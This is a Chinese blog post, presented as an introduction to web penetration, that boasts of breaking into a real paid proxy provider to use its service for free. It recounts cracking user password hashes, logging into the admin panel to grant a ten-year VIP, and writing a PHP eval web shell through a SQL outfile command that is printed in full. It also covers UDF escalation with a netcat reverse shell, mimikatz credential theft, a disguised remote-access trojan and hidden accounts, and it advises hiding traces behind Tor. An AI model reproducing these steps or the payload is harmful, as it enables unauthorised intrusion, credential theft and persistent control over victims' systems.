写在前面
文章概要
分享一次Web渗透经历。大概讲述的是一个渣渣程序员,凭借运气的加持,经过不懈的尝试和努力,最终拿下某代理运营商,走上人生巅峰的故事!
同时本文将以PPT的形式进行展现和概述,通篇不会很详细,旨在通过一次渗透经历让大家认识到Web渗透的一些攻击手段!
文章目录
本次攻击大概分为五个过程,包括信息收集
、漏洞挖掘
、后台攻入
、爆破提权
以及后门远控
。
攻击目标
XX代理运营商(收费)
攻击目的
目的很简单,也很单纯:想白嫖,免费代理出国~
信息收集
信息收集渠道很多,如子域名挖掘
、whois
、nmap指纹识别
等等。网上也有很多文章介绍,如:https://blog.csdn.net/Eastmount/article/details/102816621
,这里就不一一介绍了。
收集结果如下,目前看用处不大!
漏洞挖掘
漏洞扫描工具,像AppScan
、AWVS
、Nessus
这些开源,且用的比较多,也还有很多其他扫描工具,如:Ladon(https://github.com/k8gege/Ladon)等。
同样网上也有很多文章介绍,如:https://blog.csdn.net/MyPC2010/article/details/77679760?locationNum=5&fps=1
,这里也不详细介绍了。
扫描结果如下,目前看用处也不大!
SqlMap
跑一下,也没有什么成效:
网站目录扫描
一下,找到一些好东西:
后台攻入
既然拿到了源码,那么代码审计
一波,拿到下面这些有用的资料:
数据库导入到本地MySQL:
好家伙,这应该就是该软件的用户表了,可惜密码是MD5的~,如果破·解了应该就可以用这些账号密码去白嫖登录了。尝试彩虹爆破
一波:
整理到excel:
并且意外收获是:管理员账号和密码被破解出来了!这下就可以尝试登录后台
了,如下(登录注意隐藏脚印,使用洋葱浏览器或者高匿代理等):
那肯定要给自己加一个VIP咯:
无限续费,先续个10年吧:
另外发现后台管理没有图片、文件的上传机会,即无法上传网马提权
。
爆破提权
期间遇到了四个麻烦问题。
麻烦一
扫描敏感文件,查得phpinfo
:
如图网站部署在c盘的wwwroot子目录下,那么只需执行:1
select '<?php @eval($_POST[\'pwd\']);?>' into outfile 'C://inetpub//wwwroot//shell.php';
即可将一句话网马写入到网站根目录。
麻烦二
麻烦三
麻烦四
写入udf.dll
到目标机器,并反弹2018端口
,等待NC连接:
我的本地电脑使用NC连接到目标机器,并添加登录用户和密码:
具体udf提权方式网上一大堆,这里也不讲了。
然后就可以远程连接目标机器了,使用mimikatz
获取目标机器的administrator用户密码:
后门远控
远控工具就太多了,灰鸽子
、QuasarRAT
、gh0stRAT
、冰河
、JBiFrostRAT
、NanoCore
、上兴远控
、RemcosRAT
、PCShare
……
我这里使用的就是常见的灰鸽子
,首先使用灰鸽子生成好要放到目标机器上去的远控马
,然后如下,简单伪装一下,再运行:
主机上线:
留下隐身账户
,以下方式可创建隐身用户,受害者无法发现该隐身用户的存在:
木马程序可能会被360、卡巴等查杀,或者无法穿透一些防火墙屏蔽的端口,所以网马
还是需要留下的(最好是僵尸马,杀不死那种):
最后,文章到这里就算结束了,希望通过本文让你对Web渗透有一些入门认识,感谢您的阅读 ,下期再会 ~
更多文章,请关注:开猿笔记